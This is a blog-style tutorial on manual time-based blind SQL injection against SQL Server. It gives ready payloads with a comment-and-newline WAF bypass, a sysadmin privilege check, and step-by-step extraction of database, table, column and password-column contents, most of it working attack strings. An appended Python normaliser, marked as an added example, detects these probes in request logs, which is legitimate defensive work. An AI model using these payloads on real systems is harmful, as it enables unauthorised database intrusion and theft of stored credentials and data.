2 months ago (09-13)  SQL Server

Assume a PHP + SQL Server environment with a POST injection point where only time-based blind injection is possible. A firewall is in place; sqlmap can bypass it but still cannot complete the injection. The manual injection statements are as follows:

0x1: Check whether the injection point exists:

#inject is the injection point; --OwlXXpFshm%0A bypasses the WAF by replacing each space with a comment plus a line break
#If the injection exists, the response will be delayed by 5 seconds or more
inject';WAITFOR--OwlXXpFshm%0ADELAY--OwlXXpFshm%0A'0:0:5'--

0x2: Check privileges:

#If the current login is a member of the sysadmin role, the response is delayed by 5 seconds
inject';if ( select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

0x3: Find the length and name of the current database

#Use '>' with a binary search to find the length
inject';if(len(db_name()))>40 WAITFOR DELAY '0:0:5'--
#Find the database name
#substring extracts the character at a given position; ascii converts it to a number so a binary search can be done
inject';if(ascii(substring(db_name(),1,1)))>40 WAITFOR DELAY '0:0:5'--

0x4: Find the database version

inject';if(ascii(substring((select @@version),22,1))=50 WAITFOR DELAY '0:0:5'--

0x5: Count the tables

select count(*) from SysObjects where xtype='u' #count the user tables
inject';if((select count(*) from SysObjects where xtype='u')>15) WAITFOR DELAY '0:0:5'--

0x6: Find the length of the first table name

select top 1 name from SysObjects where xtype='u'#select the first table
(select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u')#the result is 1
and len(name)=9#use and to test a guess; 9 is the guessed length of the table name
inject';if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and len(name)=9)=1) WAITFOR DELAY '0:0:5'--

0x7: Find the name of the first table

inject';if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u') and ascii(substring(name,1,1))>90)=1) WAITFOR DELAY '0:0:5'--

0x8: Find the length of the second table name

select top 1 name from SysObjects where xtype='u' and name not in ('TB1')#select the first table name after excluding TB1, where TB1 is the name of the first table
#Likewise, for the third table use and name not in ('TB2','TB1')
inject';if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u' and name not in ('TB1')) and len(name)>1)<>0) WAITFOR DELAY '0:0:5'--

0x9: Find the name of the second table

inject';if((select count(*) from SysObjects where name in (select top 1 name from SysObjects where xtype='u' and name not in ('TB1')) and ascii(substring(name,1,1))>1)=1) WAITFOR DELAY '0:0:5'--

0x10: Find the columns of table TB

#and name not in ('') - when querying the second column, put the first column's name inside it to exclude that column
inject';if((select count(*) from syscolumns where name in (select top 1 name from syscolumns where id = object_id('TB') and name not in ('')) and ascii(substring(name,1,1))>1)<>0) WAITFOR DELAY '0:0:1'--

0x11: Find the values of column CL in table TB

#Fill not in with the values already found
inject';if((select count(*) from TB where CL in (select top 1 CL from TB where CL not in ('')) and ascii(substring(CL,1,1))>1)=1) WAITFOR DELAY '0:0:1'--

0x12: Find the column types

inject';if((select count(*) from information_schema.columns where data_type in(select top 1 data_type from information_schema.columns where table_name ='TB') and ascii(substring(data_type,1,1))>116)<>0) WAITFOR DELAY '0:0:5'--

0x13: Other statements

SELECT Name FROM Master..SysDatabases ORDER BY Name#list all databases
SELECT top 1 sb.name FROM syscolumns s JOIN sysobjects sb ON s.id=sb.id WHERE s.name='password'#find the names of tables that have a password column
inject';if((select count(*) from sysobjects where name in ((select name from sysobjects where name in (SELECT top 1 sb.name FROM syscolumns s JOIN sysobjects sb ON s.id=sb.id WHERE s.name='password') and ascii(substring(sysobjects.name,1,1))>1)))>0) waitfor delay '0:0:1'--
SELECT top 1 name FROM SysColumns where name like '%pass%'#find column names containing pass
inject';if((select count(*) from SysColumns where name in (SELECT top 1 name FROM SysColumns where name like '%pass%' and ascii(substring(name,1,1))>1))>0) waitfor delay '0:0:1'--
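As an added example that is not part of the original post, the following Python normaliser shows how a defender can undo the comment-plus-line-break spacing trick used above and flag the delay, privilege and metadata probes in request logs. The sample request bodies are constructed, modelled on the payloads in this post; the signature names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample POST parameter values, modelled on the payloads in this post.
SAMPLES = [
    "inject';WAITFOR--OwlXXpFshm%0ADELAY--OwlXXpFshm%0A'0:0:5'--",
    "inject';if ( select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--",
    "inject';if((select count(*) from SysObjects where xtype='u')>15) WAITFOR DELAY '0:0:5'--",
    "inject",
    "O'Brien",
]

# A "--<comment>\n" sequence is treated by SQL Server as whitespace, which is
# exactly why it defeats space-based WAF rules; fold it back into a space.
COMMENT_NL = re.compile(r"--[^\r\n]*\r?\n")

# Probe signatures (names are assumptions) applied to the normalised text.
SIGNATURES = {
    "time-delay": re.compile(r"\bwaitfor\s+delay\b"),
    "privilege-probe": re.compile(r"\bis_srvrolemember\s*\("),
    "metadata-probe": re.compile(r"\b(sysobjects|syscolumns|information_schema\.columns)\b"),
    "charwise-compare": re.compile(r"\bascii\s*\(\s*substring\s*\("),
}


def normalize(raw: str) -> str:
    """URL-decode, turn comment+newline into a space, collapse whitespace, lowercase."""
    s = unquote_plus(raw)
    s = COMMENT_NL.sub(" ", s)
    s = re.sub(r"\s+", " ", s)
    return s.strip().lower()


def classify(raw: str) -> list[str]:
    """Return the names of the signatures the normalised input matches (empty if benign)."""
    s = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(s)]


if __name__ == "__main__":
    for body in SAMPLES:
        print(f"{classify(body) or 'clean'!s:45} <- {normalize(body)}")
```

Run against real logs, the normalised form is what a detection rule should match, since the raw body of the first sample contains neither a space nor the literal string "WAITFOR DELAY".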


Unless otherwise noted, all articles on this site are original work of 铁匠运维网; when reposting, please cite the source: http://www.tiejiang.org/22272.html
